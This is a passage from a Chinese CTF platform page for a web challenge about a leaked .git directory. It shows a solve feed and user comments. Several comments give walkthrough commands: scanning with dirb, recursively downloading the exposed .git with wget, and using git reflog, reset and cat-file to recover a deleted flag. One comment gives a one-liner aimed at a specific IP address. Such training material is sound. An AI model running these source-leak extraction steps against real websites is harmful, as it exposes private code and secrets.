评分(29)
解题动态
塞法利娅 攻破了该题 8分钟前
hhh黄包车 攻破了该题 1小时前
西红柿和泥 攻破了该题 4小时前
渴死的鱼 攻破了该题 13小时前
Da1ly_1upup 攻破了该题 21小时前
放过我吧 攻破了该题 23小时前
Good001 攻破了该题 23小时前
13months 攻破了该题 23小时前
2022215744 攻破了该题 1天前
onee 攻破了该题 1天前
incoparab 攻破了该题 1天前
嘿嘿嘿 攻破了该题 1天前
huagoo 攻破了该题 1天前
不会打CTF的小白忆 攻破了该题 1天前
17200638803 攻破了该题 1天前
tcg979 攻破了该题 1天前
qidianzhi 攻破了该题 1天前
FroyoCatQWQ 攻破了该题 1天前
peterpan2333 攻破了该题 2天前
评论
Jackbanbo 4年前
举报
真无语,弹幕里都是大佬 理解难啊,我说一下吧wget下载后先进入114xxx目录=》再使用git reflog
Z1ek34R 4年前
举报
xixi
小赵同学 4年前
举报
emmmm
Taer 4年前
举报
git is.......差点默认以为这个也是假的flag
chun 4年前
举报
一看Linux系统 先用dirb 扫描,发现存在.git目录 用wget -r http://ip_address/.git 递归下载下来,进入文件夹 git reflog (查看执行的命令日志) git show commit_id (查看某次commit的内容) 成功得到flag
gogogogogoEcho 2年前
举报
sang lang he +1
18340362523 4年前
举报
简单易懂,不粗大佬
成朗 4年前
举报
多谢大佬的解答,爱您!撒浪嘿
2694218551 4年前
举报
下载源码后 git reflog 查看 记录 有可能版本都回退一遍 git reset --hard 版本号 cat flag.txt 我的是在 40c6d51 这个版本中找到的,其他都是假flag
ttw_is_here 4年前
举报
wget -r http://114.67.246.176:PORT/.git&&cd 114.67.246.176* && for i in `git reflog|awk '{print $1}' `;do git cat-file -p `git ls-tree $i|grep flag.txt|awk '{print $3}'` 2>/dev/null;done;
HaNkLe 4年前
举报
1. 先扫描网站目录,发现 .git 频繁出现,于是第一反应是 .git 泄露,于是打开网页 http://ip_address/.git,看到的确存在 git 泄露; 2. wget -r http://ip_address/.git 递归下载 .git 目录文件,得到一个文件夹 3. 执行 git reflog 查看执行的命令日志,发现 commit ID 为 13ce8d0
after 4年前
举报
@HaNkLe 好嘞,谢谢表哥,3Q
HaNkLe 4年前
举报
@after 评论长度有限,就给我截了。接上文:执行 git reset 13ce8d0,回退到该版本的版本库,然后执行 git status 会发现 delete flag.txt,然后执行 git checkout -- flag.txt 将暂存区的 flag.txt 还原到工作区
after 4年前
举报
好多commit ID,用哪一个,然后找到id,flag呢
夜布多555 4年前
举报
谢大佬
junlebao 4年前
举报
多谢大佬提示
fallingskies 4年前
举报
射射兄弟
qscf123456 4年前
举报
git泄露利用工具不止GitHack还有JGitHack。下载后利用git cat-file、git ls-tree命令操作。关注40开头的那串哈希值 可以参考这个文章http://chenjingjiu.cn/index.php/2019/05/10/ichunqiu-web-hello-world/
fallingskies 4年前
举报
flag{nonono}